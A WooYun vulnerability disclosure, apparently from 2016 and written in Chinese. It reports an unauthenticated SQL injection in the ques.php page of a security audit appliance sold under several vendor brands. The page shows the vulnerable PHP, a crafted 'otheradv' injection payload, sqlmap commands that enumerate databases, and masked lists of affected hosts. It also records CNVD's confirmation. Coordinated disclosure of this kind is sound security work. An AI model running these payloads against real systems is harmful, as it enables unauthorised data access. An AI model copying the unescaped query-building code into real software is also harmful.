当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(3) 关注此漏洞

缺陷编号: WooYun-2016-173195

漏洞标题: 某安全管理(审计)系统存在SQL注入(无需登录涉及网神&网御星云等众多安全厂商)

相关厂商: cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间: 2016-01-28 10:58

公开时间: 2016-01-28 17:30

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 安全意识不足 php源码审核 安全意识不足

1人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-28: 细节已通知厂商并且等待厂商处理中
2016-02-01: 厂商已经确认,细节仅向厂商公开
2016-02-04: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-03-27: 细节向核心白帽子及相关领域专家公开
2016-04-06: 细节向普通白帽子公开
2016-04-16: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

某安全管理(审计)系统存在SQL注入(无需登录涉及网神&网御星云等众多安全厂商)

详细说明:

依然影响多个大安全厂商的”安全“产品,存在漏洞的文件为:

code 区域
/webpush/ques.php



该文件的部分代码为:

code 区域
if(isset($_POST['otheradv'])){


	$otheradv = urldecode($_POST['otheradv']);


}


for($i=1;$i<=$hiddpnum;$i++){


	$arr_col="";


	$arr_col=array();


	$dpques = "";


	$post_ques = array();


	$dpname = urldecode($_POST["hiddpname$i"]);


	$dp = $_POST["dp$i"];


	if($dp!="1"){


		if(isset($_POST["dpques$i"])){


			$post_ques = $_POST["dpques$i"];


		}


		foreach ($post_ques as $key=>$value){


			$arr_col[]="advise_".$key;


		}


		if(isset($_POST['other'.$i])&&trim($_POST['other'.$i])!=""){


			$dpques.="其它:".urldecode($_POST['other'.$i]);


		}


	}


	addQuesDate($dpname,$dp,$tel,$ip,$time,$dpques,$otheradv,$name,$arr_col,$post_ques);


}



可以看出POST参数otheradv经过的urldecode解码进入了addQuesDate函数,继续跟上

code 区域
function addQuesDate($post_name,$content,$tel_num,$ip,$time,$advise,$other,$ques_name,$col,$ques){


	$sql = "insert into tb_web_push(`post_name`,`content`,`tel_num`,`ip`,`time`";


	if($advise!=""){


		$sql.=",`advise`";


	}


	$sql.=",`other`,`ques_name`";


	if(!empty($col)){


		foreach ($col as $key=>$value)


		{


			$sql.=",`".$value."`";


		}


	}


	$sql.=") values('$post_name','$content','$tel_num','$ip','$time'";


	if($advise!=""){


		$sql.=",'$advise'";


	}


	$sql.=",'$other','$ques_name'";


	if(!empty($ques)){


		foreach ($ques as $key=>$value){


			$sql.=",'$value'";


		}


	}


	$sql.=")";


	$result = byzoro_query_local($sql);


	return $result;


}



可以看出,该参数进入了sql语句的insert语句,造成了注入

为了能使用sqlmap进行数据测试,我们提交otheradv为如下参数即可:

code 区域
otheradv=1%2527,(select post_name from tb_web_push where tel_num=1*))%23

漏洞证明:

由于该漏洞同样影响多个系统,随便选择几个系统作漏洞证明

0x1 **.**.**.**:8443/ (网神安全审计系统)

code 区域
sqlmap.py -u "**.**.**.**:8443/webpush/ques.php" --data "hiddpnum=1&hiddpname1=1&dp1=1&name=1&tel=1231&otheradv=1%2527,(select post_name from tb_web_push where tel_num=1*))%23" --dbms mysql --technique T



1.png



0x2 **.**.**.**:8443/(网御上网行为管理系统)

code 区域
sqlmap.py -u "**.**.**.**:8443/webpush/ques.php" --data "hiddpnum=1&hiddpname1=1&dp1=1&name=1&tel=1231&otheradv=1%2527,(select post_name from tb_web_push where tel_num=1*))%23" --dbms mysql --technique T



2.png



利用sqlmap获取的数据,如图

code 区域
sqlmap.py -u "**.**.**.**:8443/webpush/ques.php" --data "hiddpnum=1&hiddpname1=1&dp1=1&name=1&tel=1231&otheradv=1%2527,(select post_name from tb_web_push where tel_num=1*))%23" --dbms mysql --technique T --dbs



3.png



其他还有大量的案例,这里给出部份:

code 区域
网神


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/





网御


**.**.**.**:8443/


https://**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


https://**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


https://**.**.**.**:8443/


https://**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2016-02-01 18:16

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录